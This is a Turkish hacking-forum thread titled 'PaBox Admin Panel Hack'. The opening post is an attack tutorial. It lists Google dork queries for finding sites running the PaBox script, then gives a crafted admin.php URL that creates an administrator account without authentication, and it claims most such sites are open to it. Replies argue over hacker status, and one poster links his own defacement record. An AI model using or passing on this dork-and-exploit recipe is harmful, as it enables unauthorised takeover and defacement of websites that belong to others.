PaBox Admin Panel Hack

blackwolf

uid=0(root)
Reaction score
0
PaBox Admin Panel Hack

S.@

Sizlere PaBox Panel’de Admin olmaktan bahsedeceğim.Bu Açığı Kapatan Siteler %30 u geçmez yani %70 i bizim demektir.Ben şahsen denedim:).

İlk önce En büyük yardımcımız olan Google dan başlayalım.Burda dikkat etmeniz gereken bir husus bu scriptin ana sayfasının index.php yerine thebox.php olması... ve çoğunlukla da thebox klasöründe bulunmaktadır.

inurl:thebox/thebox.php

inurl:thebox/admin.php

intitle:paBox Admin Panel

...

Sadece bu verdiklerim ile yetinmeyin kendiniz de bir şeyler yapın mesela sonlarına site:il... şeklinde ekleyip ülkesini, belirtebilirsiniz...

Sitemizi bulduk http://www.example.com/thebox/thebox.php Burada görmüş olduğunuz

/thebox.php yerine

/admin.php?act=write&username=blackwolf&password=123456&aduser=blackwolf&adpass=123456 /SPAN face=Times New Roman

yazıyoruz daha sonra 2 defa yönlendirme(Yönlendirmede beklememek için linklere tıklayın ) çıkacak ve bizi admin paneline yönlendircek.

Kullanıcı Adı: blackwolf

Şifre: 123456

TAMAMİ İLE ALINTIDIR

blackwolf yerine istediğiniz nicki şifre yerine de istediğiniz şifreyi yazın o kulllanıcıyı oluşturur

kardeş sölemeyi unutmuş o nicke bağlı kalmayın kendinizinkini oluştuunrun kesinlikle!

sadece gülüyorum bunu bilmeyen sence varmıdır heee eğer varsa bıraksın yaşamayı

Php - nuke dede boyLe bir acik wardi auhauaehue :) Yani LamerLikten 0te bir sey degiL ancak payLastigin icin sagoL ....

önemli olan açığı kullanmak lkamerlik deil site hackliomusun o açıkla hacklion olay bitmiştir

ewt tambi lamerlik artık hEHhehE BU ARADA BİLMİYENLER VARDIR anladın mı dostum?

yeni gelenler mesela sen açıklayamammışın yazamadın heralde :D ben yazdım teşekkürleri mi isterim bana :D

ozaman arkadasım gövde gösterisinde icraatlarını yayınlayında görekim sizin hackerliğinizi ala ala ben bu yöntem olsun fso olsun exploit olsun öle hacklerim ha ben hackerim demiom ama lamerde deilim lamerin ne olduğunu bil öle konus sana tanımlayamda
Lamer:KEndini HAcker Zannedip Sadece İnsanları Ben Haackerim Sunu Yaparım Dien İnsanlardır..oks

Bide Benimn İcraatlarım Burda
http://www.zone-h.org/defacements/filter/filter_defacer=blackwolf baka bilirsin

BeyLer Tarti$ma ortami yaratmayin Lutfen..

Geri